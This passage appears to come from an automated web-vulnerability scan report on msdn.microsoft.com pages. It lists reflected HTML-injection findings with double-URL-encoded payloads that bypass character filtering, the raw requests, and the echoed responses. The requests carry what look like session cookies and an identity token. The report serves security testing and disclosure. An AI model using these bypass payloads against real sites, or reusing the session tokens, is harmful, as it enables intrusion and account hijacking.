17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.NumberOfVisits=3&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;
Response (redirected)
HTTP/1.1 200 OK Cache-Control: private Content-Length: 9215 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/ Set-Cookie: Sto.UserLocale=en-us; path=/ X-AspNetMvc-Version: 2.0 X-AspNet-Version: 4.0.30319 X-Powered-By: ASP.NET P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" X-Powered-By: ASP.NET Date: Sat, 11 Dec 2010 18:14:49 GMT
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met ...[SNIP]... <input type="hidden" name="fromPage" value="http://msdn.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us/library/ms689718(va2915"><a>82109de73e3=vs.85" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d5739%2522%253e%253ca%253e5aed2fa913e was submitted in the REST URL parameter 1. This input was echoed as d5739"><a>5aed2fa913e in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Vary: Accept-Encoding Server: Microsoft-IIS/7.5 P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/ Set-Cookie: Sto.UserLocale=en-us; path=/ X-AspNetMvc-Version: 2.0 X-AspNet-Version: 4.0.30319 X-Powered-By: ASP.NET P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" X-Powered-By: ASP.NET Date: Sat, 11 Dec 2010 17:57:54 GMT Content-Length: 9192
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met ...[SNIP]... <input type="hidden" name="fromPage" value="http://msdn.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-usd5739"><a>5aed2fa913e/library/ms689718(v=vs.85)" /> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4104c%2522%253e%253ca%253eafd812d233f was submitted in the REST URL parameter 2. This input was echoed as 4104c"><a>afd812d233f in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Vary: Accept-Encoding Server: Microsoft-IIS/7.5 P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/ Set-Cookie: Sto.UserLocale=en-us; path=/ X-AspNetMvc-Version: 2.0 X-AspNet-Version: 4.0.30319 X-Powered-By: ASP.NET P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" X-Powered-By: ASP.NET Date: Sat, 11 Dec 2010 17:58:26 GMT Content-Length: 9192
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met ...[SNIP]... <input type="hidden" name="fromPage" value="http://msdn.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us/library4104c"><a>afd812d233f/ms689718(v=vs.85)" /> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4022c%2522%253e%253ca%253e3828408d185 was submitted in the REST URL parameter 3. This input was echoed as 4022c"><a>3828408d185 in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Vary: Accept-Encoding Server: Microsoft-IIS/7.5 P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/ Set-Cookie: Sto.UserLocale=en-us; path=/ X-AspNetMvc-Version: 2.0 X-AspNet-Version: 4.0.30319 X-Powered-By: ASP.NET P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" X-Powered-By: ASP.NET Date: Sat, 11 Dec 2010 17:58:57 GMT Content-Length: 9193
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met ...[SNIP]... <input type="hidden" name="fromPage" value="http://msdn.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us/library/ms689718(v4022c"><a>3828408d185=vs.85)" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8e8ab%2522%253e%253ca%253ef7a12be2b11 was submitted in the REST URL parameter 1. This input was echoed as 8e8ab"><a>f7a12be2b11 in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /en-us8e8ab%2522%253e%253ca%253ef7a12be2b11/library/ms690384(VS.85).aspx HTTP/1.1 Host: msdn.microsoft.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8N00023AU0402g3AU04; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=3&Microsoft.IdentityToken=kOokMFaWxlA23AvE+Hovb9H4y1RUhQy0AU4/eVbZGzjiVHeqWzr/U+x5WqOMs1wSjM91O37I3cnEdc66bC0AgM6Me9o2VpGUwASFFCJax9pYsoyR7i3/3YqEXumj8F3mJjRzFHUi1+Et6Lv3JYFfrmA+3diPodM+l37yEfrZyhceWOUk10TzViXSa6HYG1I1+4/93tyRU+kGk6Mr1VlUyKlrXONfWaTRG0csjFD+YjB2GWm9i/TA7QK3mLWbGSsMuceHtFBSzcrEDusOszypFD5LPLQUEkAJ6qGsxa4xu19Q1rb6qDc7UabaddRla0WBX5CBvgrPCA8MhzBrb7Balkx6W+cGi98BA3s04XsAUvSTikJ1PXw8D88GLHK5YV0rF4bdzrv0KD0lOyVEe0pqiW5ewoo5zVdgiSSYqDrGcjngnvCIfEJHAIplHQVNkuG9+b+J46TmrdcZPOlFCnupmEwQpvgkkLhAYlguUsfZfueJyAr6xluaRhuDt9cCVMQQqFUgCHKqndmbkc0cqlGCAtnbHNkgFBl6VK+iHeYeK9I=&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.NumberOfVisits=3&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;
Response (redirected)
HTTP/1.1 200 OK Cache-Control: private Content-Length: 9213 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/ Set-Cookie: Sto.UserLocale=en-us; path=/ X-AspNetMvc-Version: 2.0 X-AspNet-Version: 4.0.30319 X-Powered-By: ASP.NET P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" X-Powered-By: ASP.NET Date: Sat, 11 Dec 2010 18:14:59 GMT
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met ...[SNIP]... <input type="hidden" name="fromPage" value="http://msdn.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us8e8ab"><a>f7a12be2b11/library/ms690384(VS.85)" /> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 65890%2522%253e%253ca%253ec471cad6006 was submitted in the REST URL parameter 2. This input was echoed as 65890"><a>c471cad6006 in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /en-us/library65890%2522%253e%253ca%253ec471cad6006/ms690384(VS.85).aspx HTTP/1.1 Host: msdn.microsoft.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8N00023AU0402g3AU04; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=3&Microsoft.IdentityToken=kOokMFaWxlA23AvE+Hovb9H4y1RUhQy0AU4/eVbZGzjiVHeqWzr/U+x5WqOMs1wSjM91O37I3cnEdc66bC0AgM6Me9o2VpGUwASFFCJax9pYsoyR7i3/3YqEXumj8F3mJjRzFHUi1+Et6Lv3JYFfrmA+3diPodM+l37yEfrZyhceWOUk10TzViXSa6HYG1I1+4/93tyRU+kGk6Mr1VlUyKlrXONfWaTRG0csjFD+YjB2GWm9i/TA7QK3mLWbGSsMuceHtFBSzcrEDusOszypFD5LPLQUEkAJ6qGsxa4xu19Q1rb6qDc7UabaddRla0WBX5CBvgrPCA8MhzBrb7Balkx6W+cGi98BA3s04XsAUvSTikJ1PXw8D88GLHK5YV0rF4bdzrv0KD0lOyVEe0pqiW5ewoo5zVdgiSSYqDrGcjngnvCIfEJHAIplHQVNkuG9+b+J46TmrdcZPOlFCnupmEwQpvgkkLhAYlguUsfZfueJyAr6xluaRhuDt9cCVMQQqFUgCHKqndmbkc0cqlGCAtnbHNkgFBl6VK+iHeYeK9I=&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.NumberOfVisits=3&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;
Response (redirected)
HTTP/1.1 200 OK Cache-Control: private Content-Length: 9213 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/ Set-Cookie: Sto.UserLocale=en-us; path=/ X-AspNetMvc-Version: 2.0 X-AspNet-Version: 4.0.30319 X-Powered-By: ASP.NET P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" X-Powered-By: ASP.NET Date: Sat, 11 Dec 2010 18:15:12 GMT
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met ...[SNIP]... <input type="hidden" name="fromPage" value="http://msdn.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us/library65890"><a>c471cad6006/ms690384(VS.85)" /> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7e453%2522%253e%253ca%253e10d89de2b26 was submitted in the REST URL parameter 3. This input was echoed as 7e453"><a>10d89de2b26 in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /en-us/library/ms690384(VS.85).aspx7e453%2522%253e%253ca%253e10d89de2b26 HTTP/1.1 Host: msdn.microsoft.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8N00023AU0402g3AU04; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=3&Microsoft.IdentityToken=kOokMFaWxlA23AvE+Hovb9H4y1RUhQy0AU4/eVbZGzjiVHeqWzr/U+x5WqOMs1wSjM91O37I3cnEdc66bC0AgM6Me9o2VpGUwASFFCJax9pYsoyR7i3/3YqEXumj8F3mJjRzFHUi1+Et6Lv3JYFfrmA+3diPodM+l37yEfrZyhceWOUk10TzViXSa6HYG1I1+4/93tyRU+kGk6Mr1VlUyKlrXONfWaTRG0csjFD+YjB2GWm9i/TA7QK3mLWbGSsMuceHtFBSzcrEDusOszypFD5LPLQUEkAJ6qGsxa4xu19Q1rb6qDc7UabaddRla0WBX5CBvgrPCA8MhzBrb7Balkx6W+cGi98BA3s04XsAUvSTikJ1PXw8D88GLHK5YV0rF4bdzrv0KD0lOyVEe0pqiW5ewoo5zVdgiSSYqDrGcjngnvCIfEJHAIplHQVNkuG9+b+J46TmrdcZPOlFCnupmEwQpvgkkLhAYlguUsfZfueJyAr6xluaRhuDt9cCVMQQqFUgCHKqndmbkc0cqlGCAtnbHNkgFBl6VK+iHeYeK9I=&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.NumberOfVisits=3&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;
Response (redirected)
HTTP/1.1 200 OK Cache-Control: private Content-Length: 9223 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/ Set-Cookie: Sto.UserLocale=en-us; path=/ X-AspNetMvc-Version: 2.0 X-AspNet-Version: 4.0.30319 X-Powered-By: ASP.NET P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" X-Powered-By: ASP.NET Date: Sat, 11 Dec 2010 18:15:24 GMT
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met ...[SNIP]... <input type="hidden" name="fromPage" value="http://msdn.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us/library/ms690384(VS.85).aspx7e453"><a>10d89de2b26" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 34672%2522%253e%253ca%253e13af3ebde69 was submitted in the REST URL parameter 1. This input was echoed as 34672"><a>13af3ebde69 in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /en-us34672%2522%253e%253ca%253e13af3ebde69/library/ms691105(VS.85).aspx HTTP/1.1 Host: msdn.microsoft.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8N00023AU0402g3AU04; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=3&Microsoft.IdentityToken=kOokMFaWxlA23AvE+Hovb9H4y1RUhQy0AU4/eVbZGzjiVHeqWzr/U+x5WqOMs1wSjM91O37I3cnEdc66bC0AgM6Me9o2VpGUwASFFCJax9pYsoyR7i3/3YqEXumj8F3mJjRzFHUi1+Et6Lv3JYFfrmA+3diPodM+l37yEfrZyhceWOUk10TzViXSa6HYG1I1+4/93tyRU+kGk6Mr1VlUyKlrXONfWaTRG0csjFD+YjB2GWm9i/TA7QK3mLWbGSsMuceHtFBSzcrEDusOszypFD5LPLQUEkAJ6qGsxa4xu19Q1rb6qDc7UabaddRla0WBX5CBvgrPCA8MhzBrb7Balkx6W+cGi98BA3s04XsAUvSTikJ1PXw8D88GLHK5YV0rF4bdzrv0KD0lOyVEe0pqiW5ewoo5zVdgiSSYqDrGcjngnvCIfEJHAIplHQVNkuG9+b+J46TmrdcZPOlFCnupmEwQpvgkkLhAYlguUsfZfueJyAr6xluaRhuDt9cCVMQQqFUgCHKqndmbkc0cqlGCAtnbHNkgFBl6VK+iHeYeK9I=&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.NumberOfVisits=3&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;
Response (redirected)
HTTP/1.1 200 OK Cache-Control: private Content-Length: 9213 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/ Set-Cookie: Sto.UserLocale=en-us; path=/ X-AspNetMvc-Version: 2.0 X-AspNet-Version: 4.0.30319 X-Powered-By: ASP.NET P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" X-Powered-By: ASP.NET Date: Sat, 11 Dec 2010 18:14:46 GMT
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met ...[SNIP]... <input type="hidden" name="fromPage" value="http://msdn.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us34672"><a>13af3ebde69/library/ms691105(VS.85)" /> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fcffb%2522%253e%253ca%253e734127f3eb7 was submitted in the REST URL parameter 2. This input was echoed as fcffb"><a>734127f3eb7 in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
